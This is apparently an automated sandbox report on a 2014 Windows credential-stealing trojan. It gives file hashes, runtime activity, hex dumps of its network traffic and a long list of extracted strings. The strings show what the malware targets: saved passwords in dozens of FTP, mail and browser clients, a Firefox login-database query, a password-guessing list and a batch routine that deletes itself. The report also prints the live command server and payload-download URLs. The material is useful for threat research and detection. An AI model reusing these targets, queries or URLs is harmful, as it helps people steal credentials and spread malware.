Analysis Date2014-08-24 20:40:44
MD594cb4a0ebbcea31bc85e6336a2ece3a6
SHA106e74d0e510d60c539d9fec5e93fd2c76d47893e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1830392cd438729fc1ea92af7ce289cf sha1: 66e171ff51719d3bf1e4a1c20549c6704e0499ce size: 73728
Section.rdata md5: ea55f1bb8edcc7d52cc0e03f8c79e7e9 sha1: 3961dc0a2888ccac22b88d8751f95a8d51f19f7f size: 4096
Section.data md5: 0e3985ee9fd1e01f5711048743c9c2d6 sha1: 2721855cfae386c77659dd3e166cdd300747881f size: 24576
Section.reloc md5: 5faf8dd48acce2423cc253c6da32a928 sha1: 7246b1c04af57b727d8aa786d186d545701ed1eb size: 8192
Timestamp2014-08-12 08:56:51
PEhash9ae13a4cf177c5c75f9215137a148c7b461aca1b
IMPhash65e9bbea53a9396550cbbe64462a7930

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\WinRAR\HWID ➝
NULL
Creates FilePIPE\samr
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\90765.bat
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\WINDOWS\system32\cmd.exe

Network Details:

DNSbgumban.com
Type: A
173.243.115.130
DNStruongvietgroup.com
Type: A
221.132.33.23
HTTP POSThttp://bgumban.com/photo/stream.php
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POSThttp://bgumban.com/photo/stream.php
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP GEThttp://truongvietgroup.com/wp-content/plugins/goin.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Flows TCP192.168.1.1:1031 ➝ 173.243.115.130:80
Flows TCP192.168.1.1:1032 ➝ 173.243.115.130:80
Flows TCP192.168.1.1:1033 ➝ 221.132.33.23:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7068 6f746f2f 73747265   POST /photo/stre
0x00000010 (00016)   616d2e70 68702048 5454502f 312e300d   am.php HTTP/1.0.
0x00000020 (00032)   0a486f73 743a2062 67756d62 616e2e63   .Host: bgumban.c
0x00000030 (00048)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a206964 656e7469 74792c20 2a3b713d   : identity, *;q=
0x00000060 (00096)   300d0a43 6f6e7465 6e742d4c 656e6774   0..Content-Lengt
0x00000070 (00112)   683a2032 37330d0a 436f6e6e 65637469   h: 273..Connecti
0x00000080 (00128)   6f6e3a20 636c6f73 650d0a43 6f6e7465   on: close..Conte
0x00000090 (00144)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x000000a0 (00160)   74696f6e 2f6f6374 65742d73 74726561   tion/octet-strea
0x000000b0 (00176)   6d0d0a43 6f6e7465 6e742d45 6e636f64   m..Content-Encod
0x000000c0 (00192)   696e673a 2062696e 6172790d 0a557365   ing: binary..Use
0x000000d0 (00208)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x000000e0 (00224)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x000000f0 (00240)   3b204d53 49452035 2e303b20 57696e64   ; MSIE 5.0; Wind
0x00000100 (00256)   6f777320 3938290d 0a0d0aff cfc7f5af   ows 98).........
0x00000110 (00272)   eb473f01 9390c498 899215c5 0fb7e4b4   .G?.............
0x00000120 (00288)   40308e1e d5573c74 67029659 deccb9ce   @0...W<tg..Y....
0x00000130 (00304)   09f1a2a8 941bc714 b4c96e35 86c63f51   ..........n5..?Q
0x00000140 (00320)   5182c79a 68017d52 a69ba96a 886169c7   Q...h.}R...j.ai.
0x00000150 (00336)   bb12a476 558f1ff0 d9f8f3c4 c971c44c   ...vU........q.L
0x00000160 (00352)   30d5547d 0549fcf7 0a050da8 7bf95036   0.T}.I......{.P6
0x00000170 (00368)   4bd771b1 d41312c4 9675266e c56621eb   K.q......u&n.f!.
0x00000180 (00384)   5c232ca7 7b6061a1 72c2d992 c769e6bf   \#,.{`a.r....i..
0x00000190 (00400)   e6bba817 801a9466 3e8ec57c 3c512e03   .......f>..|<Q..
0x000001a0 (00416)   ca101075 9a77aefa 9496c847 9e989d37   ...u.w.....G...7
0x000001b0 (00432)   02b2408e 65a8d88e 6f543fc7 82d4b9da   ..@.e...oT?.....
0x000001c0 (00448)   d42ba308 2974e42a 89e4360b 5f1d8644   .+..)t.*..6._..D
0x000001d0 (00464)   ceaaa2eb 82a39ba7 70a8feea 4acbcc5e   ........p...J..^
0x000001e0 (00480)   b35a92ba c71bdd2c c5147540 6ec55bd5   .Z.....,..u@n.[.
0x000001f0 (00496)   9cbcd140 ef282e23 bca26ac3 e5150bb9   ...@.(.#..j.....
0x00000200 (00512)   d690d8b7 56361c9c d66b08f8 5ed62fc9   ....V6...k..^./.
0x00000210 (00528)   906b3757 a52b9076 a97cdeb7            .k7W.+.v.|..

0x00000000 (00000)   504f5354 202f7068 6f746f2f 73747265   POST /photo/stre
0x00000010 (00016)   616d2e70 68702048 5454502f 312e300d   am.php HTTP/1.0.
0x00000020 (00032)   0a486f73 743a2062 67756d62 616e2e63   .Host: bgumban.c
0x00000030 (00048)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a206964 656e7469 74792c20 2a3b713d   : identity, *;q=
0x00000060 (00096)   300d0a43 6f6e7465 6e742d4c 656e6774   0..Content-Lengt
0x00000070 (00112)   683a2032 37330d0a 436f6e6e 65637469   h: 273..Connecti
0x00000080 (00128)   6f6e3a20 636c6f73 650d0a43 6f6e7465   on: close..Conte
0x00000090 (00144)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x000000a0 (00160)   74696f6e 2f6f6374 65742d73 74726561   tion/octet-strea
0x000000b0 (00176)   6d0d0a43 6f6e7465 6e742d45 6e636f64   m..Content-Encod
0x000000c0 (00192)   696e673a 2062696e 6172790d 0a557365   ing: binary..Use
0x000000d0 (00208)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x000000e0 (00224)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x000000f0 (00240)   3b204d53 49452035 2e303b20 57696e64   ; MSIE 5.0; Wind
0x00000100 (00256)   6f777320 3938290d 0a0d0aff cfc7f5af   ows 98).........
0x00000110 (00272)   eb473f01 9390c498 899215c5 0fb7e4b4   .G?.............
0x00000120 (00288)   40308e1e d5573c74 67029659 deccb9ce   @0...W<tg..Y....
0x00000130 (00304)   09f1a2a8 941bc714 b4c96e35 86c63f51   ..........n5..?Q
0x00000140 (00320)   5182c79a 68017d52 a69ba96a 886169c7   Q...h.}R...j.ai.
0x00000150 (00336)   bb12a476 558f1ff0 d9f8f3c4 c971c44c   ...vU........q.L
0x00000160 (00352)   30d5547d 0549fcf7 0a050da8 7bf95036   0.T}.I......{.P6
0x00000170 (00368)   4bd771b1 d41312c4 9675266e c56621eb   K.q......u&n.f!.
0x00000180 (00384)   5c232ca7 7b6061a1 72c2d992 c769e6bf   \#,.{`a.r....i..
0x00000190 (00400)   e6bba817 801a9466 3e8ec57c 3c512e03   .......f>..|<Q..
0x000001a0 (00416)   ca101075 9a77aefa 9496c847 9e989d37   ...u.w.....G...7
0x000001b0 (00432)   02b2408e 65a8d88e 6f543fc7 82d4b9da   ..@.e...oT?.....
0x000001c0 (00448)   d42ba308 2974e42a 89e4360b 5f1d8644   .+..)t.*..6._..D
0x000001d0 (00464)   ceaaa2eb 82a39ba7 70a8feea 4acbcc5e   ........p...J..^
0x000001e0 (00480)   b35a92ba c71bdd2c c5147540 6ec55bd5   .Z.....,..u@n.[.
0x000001f0 (00496)   9cbcd140 ef282e23 bca26ac3 e5150bb9   ...@.(.#..j.....
0x00000200 (00512)   d690d8b7 56361c9c d66b08f8 5ed62fc9   ....V6...k..^./.
0x00000210 (00528)   906b3757 a52b9076 a97cdeb7            .k7W.+.v.|..

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   706c7567 696e732f 676f696e 2e657865   plugins/goin.exe
0x00000020 (00032)   20485454 502f312e 300d0a48 6f73743a    HTTP/1.0..Host:
0x00000030 (00048)   20747275 6f6e6776 69657467 726f7570    truongvietgroup
0x00000040 (00064)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x00000050 (00080)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000060 (00096)   6e673a20 6964656e 74697479 2c202a3b   ng: identity, *;
0x00000070 (00112)   713d300d 0a436f6e 6e656374 696f6e3a   q=0..Connection:
0x00000080 (00128)   20636c6f 73650d0a 55736572 2d416765    close..User-Age
0x00000090 (00144)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000a0 (00160)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000b0 (00176)   4520352e 303b2057 696e646f 77732039   E 5.0; Windows 9
0x000000c0 (00192)   38290d0a 0d0a696e 6172790d 0a557365   8)....inary..Use
0x000000d0 (00208)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x000000e0 (00224)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x000000f0 (00240)   3b204d53 49452035 2e303b20 57696e64   ; MSIE 5.0; Wind
0x00000100 (00256)   6f777320 3938290d 0a0d0aff cfc7f5af   ows 98).........
0x00000110 (00272)   eb473f01 9390c498 899215c5 0fb7e4b4   .G?.............
0x00000120 (00288)   40308e1e d5573c74 67029659 deccb9ce   @0...W<tg..Y....
0x00000130 (00304)   09f1a2a8 941bc714 b4c96e35 86c63f51   ..........n5..?Q
0x00000140 (00320)   5182c79a 68017d52 a69ba96a 886169c7   Q...h.}R...j.ai.
0x00000150 (00336)   bb12a476 558f1ff0 d9f8f3c4 c971c44c   ...vU........q.L
0x00000160 (00352)   30d5547d 0549fcf7 0a050da8 7bf95036   0.T}.I......{.P6
0x00000170 (00368)   4bd771b1 d41312c4 9675266e c56621eb   K.q......u&n.f!.
0x00000180 (00384)   5c232ca7 7b6061a1 72c2d992 c769e6bf   \#,.{`a.r....i..
0x00000190 (00400)   e6bba817 801a9466 3e8ec57c 3c512e03   .......f>..|<Q..
0x000001a0 (00416)   ca101075 9a77aefa 9496c847 9e989d37   ...u.w.....G...7
0x000001b0 (00432)   02b2408e 65a8d88e 6f543fc7 82d4b9da   ..@.e...oT?.....
0x000001c0 (00448)   d42ba308 2974e42a 89e4360b 5f1d8644   .+..)t.*..6._..D
0x000001d0 (00464)   ceaaa2eb 82a39ba7 70a8feea 4acbcc5e   ........p...J..^
0x000001e0 (00480)   b35a92ba c71bdd2c c5147540 6ec55bd5   .Z.....,..u@n.[.
0x000001f0 (00496)   9cbcd140 ef282e23 bca26ac3 e5150bb9   ...@.(.#..j.....
0x00000200 (00512)   d690d8b7 56361c9c d66b08f8 5ed62fc9   ....V6...k..^./.
0x00000210 (00528)   906b3757 a52b9076 a97cdeb7            .k7W.+.v.|..


Strings
..
\
\
  
g

2http://www.facebook.com/
abe2869f-9b47-4cd9-a358-c22904dba7f7
cmd.exe
 /c start "" "%s"
e() 
Info
jjjj
jjjjjj
runas
000000
0 0&000K0
0 0&0/050I0R0X0a0g0
0 0%070<0J0
0'020<0E0P0u0
0"0G0R0w0
0$0Y0u0
080S0n0
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
;'<0<9<Y<_<
<0=A=U=o=t=y=
<0<C<V<o<
=">1>@>
111111
11111111
112233
1*1E1`1{1
1<1x1}1
123123
123321
123456
1234567
12345678
123456789
1234567890
123abc
123qwe
182C2_2
1G132P2
1Q1_1x1
1q2w3e
1q2w3e4r
20292M2
'2, /+0&7!4-)1#
222222
2/3e3y3
2+3U3p3
2.5.29.37
: :&:,:2:8:>:D:J:P:V:\:b:h:n:t:z:
;2;E;`;
\32BitFtp.ini
3"3&3*3.32363:3>3B3F3J3N3R3V3Z3^3b3f3j3n3r3v3z3~3
3(353B3O3\3i3v3
;3+#>6.&
:,:3:B:
\3D-FTP
3D-FTP
4%414s4
4(4@4Y4~4
4/4J4t4
4'4Z4c4
4(5^5c5
4E4K4U4p4
=/=4=N=S=
>.?4?>?Y?
51565<5I5N5T5a5f5l5y5~5
525C5T5w5
5%50565<5A5G5P5V5`5~5
5:6S6f6
5A5W5`5o5
616D6X6l6
654321
6%606@6H6S6
666666
6$666;6M6R6d6i6{6
6?6K6]6i6{6
697^7u7
6J7]7n7}7
>6>N>j>
6':;:p:
=6>S>f>
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
7-737B7H7}7
7777777
7!7e7s7
7+808c8h8n8
7^8c8t8y8
;+;7;'<]<b<
:":7:S:g:
8$878F8
8"8(8.848:8@8F8L8R8X8^8d8j8p8v8|8
8"8(898>8D8
8 9+909?9D9J9X9i9
8$9A9`9
;/<8<A<J<Z<
8c8i8s8
8I9Z9k9
9):.:[:
9|$4r4
9$9*90969<9B9H9N9T9Z9`9f9l9r9x9~9
9#9(9=9B9G9L9Q9V9n9
9"9'9:9P9V9
9"9Z9l9
9D9N9m9
9D$(ub
?'?9?E?W?c?z?
<&=9=M=a=
9W9*;T;];f;
:=;a;|;
;&<A<\<|<
aaaaaa
abc123
Accept: */*
Accept-Encoding: identity, *;q=0
account.cfg
account.cfn
\Accounts
accounts.ini
\AceBIT
addrbk.dat
adidas
AdjustTokenPrivileges
Administrative Tools
advapi32.dll
:*:A:g:
>A>G>Q>l>
AllocateAndInitializeSid
amanda
=#=/=A=M=d=p=4?G?V?
:/:;;A;N;
andrew
angel1
angels
anthony
aPLib v1.01  -  the smaller the better :)
AppData
AppDir
asdfasdf
asdfgh
ashley
asshole
austin
bailey
banana
bandit
baseball
\BatMail
batman
benjamin
billgates
biteme
\BitKinex
bitkinex.ds
>)>B>K>T>\>
blabla
blahblah
BlazeFtp
\BlazeFtp
blessed
blessing
blink182
bookmark.dat
\Bromium
bubbles
\BulletProof Software
buster
Buttons
canada
cassie
CertCloseStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
charlie
CheckTokenMembership
cheese
chelsea
chicken
christ
\ChromePlus
\Chromium
church
;	<(<><C<I<^<c<i<
Client Hash
CloseHandle
closesocket
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
cocacola
CoCreateGuid
CoCreateInstance
\CoffeeCup Software
CoInitializeEx
Common Administrative Tools
Common AppData
Common Documents
\Comodo
compaq
computer
Config Path
connect
Connection: close
Connections.txt
CONSTRAINT
Content-Encoding: binary
Content-Length:
Content-Length: %lu
Content-Type: application/octet-stream
ConvertSidToStringSidA
cookie
Cookies
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
corvette
CoTaskMemFree
CoUninitialize
CreateDirectoryA
CreateFileA
CreateFileMappingA
CreateStreamOnHGlobal
CreateToolhelp32Snapshot
creative
CredentialCheck
CredentialSalt
CredEnumerateA
CredFree
crypt32.dll
CryptAcquireCertificatePrivateKey
CryptDestroyKey
CryptExportKey
CryptGetUserKey
CryptReleaseContext
CryptUnprotectData
\CuteFTP
CUTEFTP
\Cyberduck
D$0;D$(
dakota
dallas
daniel
danielle
@.data
DataDir
DataDirBak
DataFolder
DataPath
%d.bat
Default
DEFDIR
 del 	  %0 
     del    	 %1  
DeleteFileA
DeluxeFTP
destiny
%d.exe
dexter
diamond
digital
Dir #%d
Directory
DisplayName
<?<D<J<n<s<y<
;'<d=j=w=
+D$P][_^
DPAPI: 
dragon
\drives.js
EasyFTP
?E?J?}?
EmailAddress
eminem
emmanuel
\Epic\Epic
ESTdb2.dat
\Estsoft\ALFTP
ExitProcess
ExpandEnvironmentStringsA
\ExpanDrive
ExpanDrive_Home
explorer.exe
FastStone Browser
FastTrack
Favorites.dat
\FileZilla
\filezilla.xml
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
Firefox
fireFTPsites.dat
\FlashFXP\3
\FlashFXP\4
\Flock\Browser\
flower
Folder
foobar
football
football1
FOREIGN
forever
freedom
FreeSid
FreshFTP
friend
friends
\Frigate3
FSProtocol
ftp://
FTP Commander
FTPCON
FTP CONTROL
FTP Count
FTP destination catalog
FTP destination password
FTP destination port
FTP destination server
FTP destination user
FtpDirectory
\FTP Explorer
FTP File%d
\FTPGetter
\FTPInfo
FtpIniName
ftplast.osd
FTP++.Link\shell\open\command
FTPList.db
ftplist.txt
FTP Navigator
FTPNow
FTP Now
FtpPassword
_FtpPassword
FtpPort
FTP profiles
\FTPRush
FtpServer
FTPShell
ftpshell.fsi
ftpsite.ini
FtpSite.xml
FtpUserName
FTPVoyager.ftp
FTPVoyager.qc
fuckoff
fuckyou
fuckyou1
full address:s:
:f:x:}:
gateway
genesis
george
GetCurrentDirectoryA
GetCurrentProcess
GetFileAttributesA
GetFileSize
GetHGlobalFromStream
gethostbyname
GetLastError
GetLocaleInfoA
GetModuleBaseNameW
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetNativeSystemInfo
GetPrivateProfileIntA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GET %s HTTP/1.0
GetSidSubAuthority
GetSidSubAuthorityCount
GetSystemInfo
GetTempPathA
GetTickCount
GetTokenInformation
GetUserNameA
GetVersionExA
GetVersionExW
GetWindowLongA
GetWindowsDirectoryA
gfhjkm
ghbdtn
\GHISLER
ginger
\Global Downloader
GlobalLock
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Lite
\GlobalSCAPE\CuteFTP Pro
GlobalUnlock
google
\Google\Chrome
\GPSoftware\Directory Opus
guitar
h0n0{0
hahaha
hannah
hardcore
harley
heaven
hello1
helpme
<-<H<h<
History
\History.dat
History.dat
:#:):H:M:S:r:w:
hockey
HostAdrs
HostDirName
Hostname
HostName
Host: %s
hotdog
http://
http://bgumban.com/photo/stream.php
<HTTPMail_Password2
HTTPMail Password2
HTTPMail Server
HTTPMail User Name
HTTP Password
https://
HTTP Server URL
http://truongvietgroup.com/wp-content/plugins/goin.exe
HTTP User
hunter
identification
identities
Identities
identitymgr
	if  		 exist 	   %1  	  goto 	
ilovegod
iloveyou
iloveyou!
iloveyou1
iloveyou2
IMAP Password
<IMAP_Password2
IMAP Password2
IMAP Port
IMAP Server
IMAP User
IMAP User Name
ImpersonateLoggedOnUser
inet_addr
inetcomm server passwords
InitialDirectory
InitialPath
\INSoftware\NovaFTP
InstallDir
Install_Dir
InstallDir1
InstallerDathPath
installpath
InstallPath
Install Path
internet
InternetCrackUrlA
InternetCreateUrlA
Internet Explorer
\Ipswitch
\Ipswitch\WS_FTP
IsRelative
IsTextUnicode
IsWow64Process
=@=]=j=
jasmine
jasper
jennifer
jessica
jesus1
john316
jordan
jordan23
joseph
joshua
junior
justin
kernel32.dll
killer
kitten
\K-Meleon
K-Meleon
knight
	   :ktk   
L$(9L$@
LastAddress
Last Directory3
Last Install Path
LastPassword
LastPort
Last Server Host
Last Server Pass
Last Server Path
Last Server Port
Last Server Type
Last Server User
LastSessionFile
LastUser
LCMapStringA
leapftp
\LeapWare\LeapFTP
letmein
LoadLibraryA
LoadUserProfileA
LocalAlloc
Local AppData
LocalDir
LocalFree
Location:
Login Data
logins
LogonUserA
london
looking
LookupPrivilegeValueA
lovely
loving
+L$PRQW
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrlenA
lstrlenW
?L?V?g?
=">M>_>
maggie
Mailbox.ini
\MapleStudio\ChromePlus
MapViewOfFile
master
matrix
matthew
maverick
maxwell
memset
merlin
michael
michelle
mickey
microsoft
\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Microsoft_WinInet_*
MNvDBVmKs6Dcxm2
monkey
More information: http://www.ibsensoftware.com/
mother
Mozilla
\Mozilla\Firefox\
\Mozilla\Profiles\
\Mozilla\SeaMonkey\
mozsqlite3.dll
msi.dll
MS IE FTP Passwords
MsiGetComponentPathA
msvcrt.dll
muffin
MultiByteToWideChar
mustang
mustdie
My Documents
My FTP
mylove
My Pictures
myspace1
nathan
NDSites.ini
netapi32.dll
NetApiBufferFree
\NetDrive
\NetSarang
NetUserEnum
NexusFile
\Nichrome
nicole
nintendo
NNTP Email Address
NNTP Password
NNTP Password2
NNTP Server
NNTP User Name
\Notepad++
nothing
NovaFTP.db
NppFTP.xml
nss3.dll
NSSBase64_DecodeBuffer
NSS_Init
NSS_Shutdown
.oeaccount
ole32.dll
OleInitialize
onelove
online
OpenProcess
OpenProcessToken
Opera.HTML\shell\open\command
orange
origin_url
?!?&?+?o?t?z?
Outlook
outlook account manager passwords
passw0rd
password
"password" : "
Password
_Password
PassWord
password1
password 51:b:
PasswordType
password_value
PathAppendW
PathToExe
peaches
peanut
pepper
Personal
PK11_Authenticate
PK11_FreeSlot
PK11_GetInternalKeySlot
PK11SDR_Decrypt
\Pocomail
\PocoSystem.ini
pokemon
POP3 Password
<POP3_Password2
POP3 Password2
POP3 Port
POP3 Server
POP3 User
POP3 User Name
PopAccount
PopPassword
PopPort
PopServer
PortNumber
POST %s HTTP/1.0
PPhnpA
praise
prayer
prefs.js
PRIMARY
prince
princess
Process32First
Process32Next
ProcessIdToSessionId
Profile
\Profiles
profiles.ini
profiles.xml
Program
ProgramDir
project.ini
psapi.dll
PSQRWV
pstorec.dll
PStoreCreateInstance
purple
qazwsx
QCHistory
QData.dat
quick.dat
\Quick.dat
qwerty
qwerty1
rachel
rainbow
`.rdata
ReadFile
\recentservers.xml
red123
RegCloseKey
RegCreateKeyA
RegEnumKeyExA
RegEnumValueA
RegOpenCurrentUser
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
RemoteDir
Remote Dir
RemoteDirectory
RevertToSelf
\RhinoSoft.com
richard
robert
\RockMelt
RootDirectory
rotimi
RushSite.xml
      "%s"   
S-1-5-18
samantha
samuel
scooby
scooter
SeaMonkey
SeAssignPrimaryTokenPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SECITEM_FreeItem
SeCreateTokenPrivilege
secret
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
select
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
SeRestorePrivilege
Server
Server.Host
ServerList.xml
ServerName
Server.Pass
Server.Port
servers.xml
ServerType
Server Type
Server.User
\Sessions
SeTcbPrivilege
SetCurrentDirectoryA
setsockopt
<setting name="
SetUnhandledExceptionFilter
shadow
shalom
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\SharedSettings.ccs
\SharedSettings.sqlite
shell32.dll
ShellExecuteA
ShellExecuteExW
Shell_TrayWnd
SHGetFolderPathA
SHGetFolderPathW
shlwapi.dll
signons2.txt
signons3.txt
signons.sqlite
signons.txt
silver
single
site.dat
\SiteDesigner
SiteInfo.QFP
\sitemanager.xml
\Sites
Sites\
sites.dat
\Sites.dat
sites.db
SitesDir
SiteServer %d\Host
SiteServer %d\Remote Directory
SiteServer %d\SFTP
SiteServer %d-User
SiteServer %d-User PW
SiteServer %d\WebUrl
SiteServers
sites.ini
\sites.xml
sites.xml
%s\Keychain
slayer
SM.arch
\SmartFTP
\sm.dat
smokey
SmtpAccount
SMTP Email Address
SmtpPassword
SMTP Password
<SMTP_Password2
SMTP Password2
SmtpPort
SMTP Port
SmtpServer
SMTP Server
SMTP User
SMTP User Name
snoopy
soccer
soccer1
socket
Software\AceBIT
Software\Adobe\Common
Software\BPFTP
Software\BPFTP\Bullet Proof FTP\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BulletProof Software\BulletProof FTP Client\Options
Software\ChromePlus
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
Software\CoffeeCup Software
Software\CoffeeCup Software\Internet\Profiles
Software\Cryer\WebSitePublisher
Software\ExpanDrive
Software\ExpanDrive\Sessions
Software\Far2\Plugins\FTP\Hosts
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\Plugins\FTP\Hosts
Software\Far Manager\SavedDialogHistory\FTPHost
Software\Far\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\FileZilla
Software\FileZilla Client
Software\FlashFXP
Software\FlashFXP\3
Software\FlashFXP\4
Software\FlashPeak\BlazeFtp\Settings
Software\FTPClient\Sites
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
Software\FTPWare\COREFTP\Sites
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\IncrediMail
SOFTWARE\LeapWare
Software\LeechFTP
Software\LinasFTP\Site Manager
Software\Martin Prikryl
Software\MAS-Soft\FTPInfo\Setup
Software\Microsoft\Internet Account Manager
Software\Microsoft\Internet Account Manager\Accounts
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Mozilla
Software\NCH Software\ClassicFTP\FTPAccounts
SOFTWARE\NCH Software\Fling\Accounts
Software\Nico Mak Computing\WinZip\FTP
Software\Nico Mak Computing\WinZip\mru\jobs
_Software\Opera Software
Software\Poco Systems Inc
Software\RimArts\B2\Settings
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
SOFTWARE\Robo-FTP 3.7\FTPServers
SOFTWARE\Robo-FTP 3.7\Scripts
Software\SimonTatham\PuTTY\Sessions
Software\SoftX.org\FTPClient\Sites
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\South River Technologies\WebDrive\Connections
Software\TurboFTP
Software\VanDyke\SecureFX
Software\WinRAR
sparky
spirit
sqlite3_close
sqlite3_column_blob
sqlite3_column_bytes
sqlite3.dll
sqlite3_open
sqlite3_prepare
sqlite3_step
SQLite format 3
Staff-FTP
startrek
starwars
STATUS-IMPORT-OK
stella
StgOpenStorage
StrCmpNIA
StrRChrIA
StrStrA
StrStrIA
StrStrIW
StrToIntA
summer
sunshine
superman
t3h]tA
tah0]A
taylor
Technology
tEhgbA
tEh}jA
tEhTbA
tEhtrA
TerminalType
TERMSRV/
TERMSRV/*
testing
testtest
tFhdcA
tFhOHA
t@h9gA
\The Bat!
t)h[fA
t@h@fA
t$h`gA
t$hhgA
t)h>iA
!This program cannot be run in DOS mode.
t@hOgA
t=hOHA
t-hOHA
t.hOHA
t(hOHA
thomas
tHSPPj%P
t$htaA
t)hTfA
thunder
Thunderbird
\Thunderbird
t"hwtA
tigger
TMTPWDFILE0TMTPKDFILE0TMTCRYPTED0TMT1.0
tQh'hA
trinity
trustno1
tSh>mA
tsh;UA
\TurboFTP
tYh0fA
u hOHA
UltraFXP
uM9l$D}G
UninstallString
UNIQUE
unleap.exe
UnloadUserProfile
UnmapViewOfFile
user32.dll
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
user.config
userenv.dll
UserID
Username
UserName
username:s:
username_value
V4`4j4t4~4
v89l$D|0
value="
_VanDyke\Config\Sessions
victory
\Visicom Media
_vsnwprintf
VWh2eA
VWPSQR
WaitForSingleObject
wand.dat
wcx_ftp.ini
Web Data
welcome
whatever
w%hc\A
WideCharToMultiByte
william
windows
winex="
WinFTP
WininetCacheCredentials
wininet.dll
\win.ini
winner
wisdom
wiseftp.ini
wiseftpsrvs.bin
wiseftpsrvs.ini
Working Directory
WriteFile
WSAStartup
WS_FTP
wsock32.dll
wsprintfA
WTSGetActiveConsoleSessionId
:";';X;
xflags
\Yandex
zxcvbnm
^_ZY[X
ZY[X_^